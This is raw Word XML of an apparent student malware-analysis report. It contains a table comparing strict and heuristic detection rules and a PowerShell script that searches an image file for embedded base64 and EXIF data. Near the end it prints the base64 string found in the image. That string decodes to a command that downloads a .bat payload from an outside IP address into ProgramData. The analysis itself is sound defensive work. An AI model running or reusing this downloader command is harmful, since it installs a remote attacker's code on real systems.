            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Condition Logic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rule uses </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AND</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> logic to tightly match known threats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Uses </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OR</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threshold logic</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to catch broader patterns (e.g., 2 of exec/inject + 1 file)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="800" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Use Case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Precision detection of known threats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Heuristic detection of unknown or evolving threats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C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Author</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Eamon Stackpole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C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Connor East</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C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2025-10-09, 2025-10-12 (is_Based64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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Same date: 2025-10-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z1vnl8vjh8il" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_83xh4cqcr772" w:id="37"/>
      <w:bookmarkEnd w:id="3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3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cz3qrptojdfu" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Rule Creation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D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includes an explanation of any new rules that were created based on observations from this assignment (unless they were explained earlier in the report). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95cg8h78bg0p" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64Decode.ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This script was created to be run against frontpage.jpg and volt.wav to check for potentially embedded BASE64 code.</w:t>
      </w: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$file = 'C:\Users\champuser\Desktop\Malware\week6\frontpage.jpg'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">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$content = [System.IO.File]::ReadAllBytes($file)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">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DA">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Write-Host "Analyzing frontpage.jpg for base64 encoding..."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">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Write-Host "File size: $($content.Length) bytes"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">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Write-Host ""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">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DE">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Convert to text and search for base64 patterns</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">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$text = [System.Text.Encoding]::ASCII.GetString($content)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">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E1">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Write-Host "=== Searching for base64 patterns (40+ chars) ==="</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">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$regex = [regex]'[A-Za-z0-9+/]{40,}={0,2}'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">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$matches = $regex.Matches($text)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">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E5">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Write-Host "Found $($matches.Count) potential base64 strings"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">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Write-Host ""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">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E8">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if ($matches.Count -gt 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">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$counter = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EA">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$matches | ForEach-Object {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">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$match = $_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">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 Match #$counter ==="</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">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"Position: $($match.Index) (0x$($match.Index.ToString('X')))"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">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"Length: $($match.Length) characters"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">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"Base64 content:"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">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$match.Value</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">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F4">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 Try to decode</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">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try {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">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$decoded = [System.Convert]::FromBase64String($match.Value)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">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$decodedText = [System.Text.Encoding]::ASCII.GetString($decoded)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">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"Successfully decoded to $($decoded.Length) bytes:"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F9">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"---DECODED START---"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">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$decodedText</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">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"---DECODED END---"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">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1FE">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 Check if decoded content is also base64</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FF">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if ($decodedText -match '^[A-Za-z0-9+/]+={0,2}$' -and $decodedText.Length -gt 40) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000200">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"WARNING: Decoded content appears to be ANOTHER layer of base64!"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">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"Attempting second decode..."</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">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try {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">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$decoded2 = [System.Convert]::FromBase64String($decodedText)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">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$decodedText2 = [System.Text.Encoding]::ASCII.GetString($decoded2)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000205">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"Second layer decoded:"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000206">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$decodedText2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000208">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 catch {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">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"Second decode failed"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020A">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t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020B">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t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020C">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 catch {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020D">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"Failed to decode: $($_.Exception.Message)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">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t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">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10">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000212">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$counter++</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000213">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t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000214">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15">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16">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Also extract EXIF data specifically</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">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Write-Host "=== Extracting EXIF metadata ==="</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">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Look for EXIF marker</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000219">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$exifPos = -1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">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for ($i = 0; $i -lt $content.Length - 10; $i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">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if ($content[$i] -eq 0x45 -and $content[$i+1] -eq 0x78 -and</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">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$content[$i+2] -eq 0x69 -and $content[$i+3] -eq 0x66) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">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$exifPos = $i</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">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"Found EXIF marker at position $i"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021F">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break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">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t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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23">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if ($exifPos -gt 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">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 Extract 500 bytes after EXIF marker</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000225">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$exifData = $content[$exifPos..($exifPos + 499)]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">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$exifText = [System.Text.Encoding]::ASCII.GetString($exifData)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">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"EXIF section (first 500 bytes):"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000228">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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tl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    Write-Host $exifText</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000229">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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1"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_44dke4i1r18p" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y0xg8ut0u9ld" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64-Check PowerShell Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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is the base-64 encoding that was detected by the above rule, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64Decode.ps</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the frontpage.jpg file. </w:t>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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Y21kIC9jIHBvd2Vyc2hlbGwgaW52b2tlLXdlYnJlcXVlc3QgLXVyaSAnaHR0cDovLzEwOC4xODEuMTU1LjMxL2FzZWZhLmJhdCcgLW91dGZpbGUgJ2M6XHByb2dyYW1kYXRhXGFzZWZhLmJhdCcK</w:t>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Decoded Output:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000230">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
